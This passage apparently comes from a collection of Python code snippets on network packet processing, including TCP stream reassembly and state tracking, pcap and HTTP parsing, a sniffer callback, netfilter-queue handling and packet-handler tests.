sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. 
no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = 
eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, 
packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = [((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. 
Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = 
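The SYN/SYN-ACK handling above indexes a dict of TCP options with dpkt's `TCP_OPT_WSCALE` and `TCP_OPT_MSS` constants and then scales the advertised window. As a hedged, illustrative sketch only (the helper name and defaults below are assumptions, not part of the stored snippet), such a dict can be built with `dpkt.tcp.parse_opts`:

```python
# Hedged sketch: build the {option_kind: raw_bytes} mapping the handshake code
# above indexes, then derive the scaled receive window. Name/defaults assumed.
import dpkt

def tcp_handshake_options(tcp: dpkt.tcp.TCP):
    opts = dict(dpkt.tcp.parse_opts(tcp.opts))   # [(kind, value), ...] -> dict
    wscale = 0
    if dpkt.tcp.TCP_OPT_WSCALE in opts:
        wscale = int.from_bytes(opts[dpkt.tcp.TCP_OPT_WSCALE], "big")
    mss = None
    if dpkt.tcp.TCP_OPT_MSS in opts:
        mss = int.from_bytes(opts[dpkt.tcp.TCP_OPT_MSS], "big")
    window = tcp.win << wscale                   # advertised window * 2**wscale
    return wscale, mss, window
```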
TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: 
{}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def receive_packet(self, packet):\n\t\treturn", "def test_process_packet(self):\n packet = {'a': 7}\n self.assertEqual(self.foo.a, 4)\n self.handler.process_packet(packet)\n self.assertEqual(self.foo.a, 7)\n packet = {'b': 9, 'a': 20}\n self.handler.process_packet(packet)\n self.assertEqual(self.foo.a, 20)\n self.assertEqual(self.foo.b, 42)", "def after_process(self, packet, ret_packet):\n pass", "def on_ofp_message(self, message: IncomingMessage) -> None:\n with message.process():\n log.debug(f\"received [x] {message.routing_key}:{message.body}\")\n (version, msg_type, msg_len, xid) = ofproto_parser.header(message.body)\n log.debug(\n f\"msg {version} {msg_type} {msg_len} {xid} {len(message.body)} {type(message.body)}\"\n )\n msg = ofproto_parser.msg(\n version, msg_type, msg_len, xid, message.body[:msg_len]\n )\n if msg_type == self.ofproto.OFPT_PACKET_IN:\n pkt_in = self.ofparser.OFPPacketIn.parser(msg_len, xid, msg.buf)\n pkt_in.serialize()\n dpid = int(message.routing_key.split(\".\")[-1])\n self.loop.create_task(self.handle_pktin(pkt_in, dpid))", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def OnESPacket(current_pid, packet, header_size):\n pass", "def dummy_transmit_handler(out_port, packet):\n pass", "def handle_packet(self, packet, udp_dport):\n return self.process_packet(packet, udp_dport)", "def sniffer_callback(self, pkt):\n #if \"Ether\" in pkt and \"IP\" in pkt and \"TCP\" in pkt:\n if \"TCP\" in pkt:\n\n # Debug check for packet details\n # print(pkt.summary())\n\n if pkt[TCP].payload:\n # print(\"[PAYLOAD]:\\n%s\" % pkt[TCP].payload)\n self.callback_object.process_packet(pkt)\n\n # Ignore packets without payload\n # else:\n # print(\"[NO-LOAD]Packet does not have 
payload!\")", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def test_process_packet_message(self):\n\n pkt = {'type': 'message',\n 'endpoint': '',\n 'data': 'woot'}\n data = self.ns.process_packet(pkt)\n self.assertEqual(data, pkt['data'])\n assert not self.environ['socketio'].error.called\n\n # processing a message packet with id and endpoint\n pkt = {'type': 'message',\n 'id': 5,\n 'ack': True,\n 'endpoint': '/tobi',\n 'data': ''}\n data = self.ns.process_packet(pkt)\n self.assertEqual(data, pkt['data'])\n assert not self.environ['socketio'].error.called", "def parse(data: bytes, port: int, origin: helpers.ConnectionType):\n # Ignore packets from master server... 
game server is more interesting\n if port == helpers.MASTER_PORT:\n return\n # Iteratively parse packet data until nothing is left to parse\n reads = 0\n while len(data) >= 2:\n reads += 1\n pid = data[:2]\n handler = PACKET_HANDLERS.get(pid, None)\n if handler:\n # Parse data without packet id prepended\n # Returned data will be parsed next iteration\n data = handler(data[2:], origin=origin)\n else:\n # This packet doesn't have a handler\n # Print it once for inspection\n if reads <= 1:\n print(f'[{pid}] - {data}\\n')\n # Remove the first byte and try parsing again later\n data = data[1:]", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n raise NotImplemented", "def packet_processing(pkt):\n with open(\"/proc/net/netfilter/nfnetlink_queue\", \"r\") as proc_file:\n proc_line = [x for x in proc_file.readline().split(\" \") if x]\n print(f\"Packets in queue: {proc_line[2]}\")\n #print(f\"Packets processed: {proc_line[7]}\")\n #TEMP\n packet = IP(pkt.get_payload())\n pkt.drop()\n return\n\n with open(LOGFILE, \"a\") as logfile:\n pkt.drop()\n start = datetime.now()\n packet = IP(pkt.get_payload())\n packet_bits = to_bit_array(packet)\n\n source_address = packet[IP].src\n print(f\"Packet received from {source_address}\")\n\n new_packet_bits, cost = quantum_protocol.transmit_packet(packet_bits, source_address)\n\n new_packet = IP(from_bit_array(new_packet_bits))\n send(new_packet)\n end = datetime.now()\n log_info(\"badnwidt.log\", start, end, new_packet_bits, cost)\n logfile.write(\"PACKET TRANSMITTED_________________\\n\")\n logfile.write(hexdump(packet, dump=True) + \"\\n\")\n logfile.write(hexdump(new_packet, dump=True) + \"\\n\")\n logfile.write(\"Transmission time:\" + str(end-start) + \"\\n\")\n #packet.show()\n #new_packet.show()", "def foward_packet_to_si(self, info, packet, address, connection, channel, db):\n try:\n head = info.head\n args = DotDict(success=GATEWAY.RESPONSE_STATUS.SUCCESS,\n command=head.command)\n dev_id = head.dev_id\n resend_key, resend_flag = get_resend_flag(self.redis, dev_id, head.timestamp, head.command)\n sessionID = QueryHelper.get_terminal_sessionID(dev_id, self.redis)\n if sessionID != head.sessionID:\n args.success = GATEWAY.RESPONSE_STATUS.INVALID_SESSIONID\n logging.error(\"[GW] Invalid sessionID, Terminal: %s\", dev_id)\n else:\n seq = str(int(time.time() * 1000))[-4:]\n uargs = 
DotDict(seq=seq,\n dev_id=dev_id,\n content=packet)\n content = UploadDataComposer(uargs).buf\n logging.info(\"[GW] Forward message to SI:\\n%s\", content)\n if resend_flag:\n logging.warn(\"[GW] Recv resend packet: %s, and drop it!\", packet)\n else:\n append_si_request(content, connection, channel, self.exchange, self.si_binding)\n update_terminal_status(self.redis, dev_id, address)\n\n #NOTE: Handle the packet.\n if head.command in (GATEWAY.T_MESSAGE_TYPE.POSITION, GATEWAY.T_MESSAGE_TYPE.MULTIPVT,\n GATEWAY.T_MESSAGE_TYPE.CHARGE, GATEWAY.T_MESSAGE_TYPE.ILLEGALMOVE,\n GATEWAY.T_MESSAGE_TYPE.POWERLOW, GATEWAY.T_MESSAGE_TYPE.ILLEGALSHAKE,\n GATEWAY.T_MESSAGE_TYPE.EMERGENCY, GATEWAY.T_MESSAGE_TYPE.POWERDOWN, \n GATEWAY.T_MESSAGE_TYPE.STOP):\n logging.info(\"[GW] Head command: %s.\", head.command)\n if args['success'] == GATEWAY.RESPONSE_STATUS.SUCCESS: \n acc_status_info_key = get_acc_status_info_key(dev_id) \n acc_status_info = self.redis.getvalue(acc_status_info_key) \n if acc_status_info and (not acc_status_info['t2_status']): # T2(query) is need \n logging.info(\"[GW] ACC_status is changed, dev_id: %s, acc_status_info: %s\", \n dev_id, acc_status_info)\n args['success'] = 3 # acc_status is changed\n\n #NOTE: composer response for terminal \n rc = AsyncRespComposer(args)\n request = DotDict(packet=rc.buf,\n address=address,\n dev_id=dev_id)\n \n append_gw_request(request, connection, channel, self.exchange, self.gw_binding)\n # resend flag\n if not resend_flag:\n self.redis.setvalue(resend_key, True, GATEWAY.RESEND_EXPIRY)\n elif head.command == GATEWAY.T_MESSAGE_TYPE.UNBIND: # S24-->T24\n logging.info(\"[GW] Head command: %s.\", 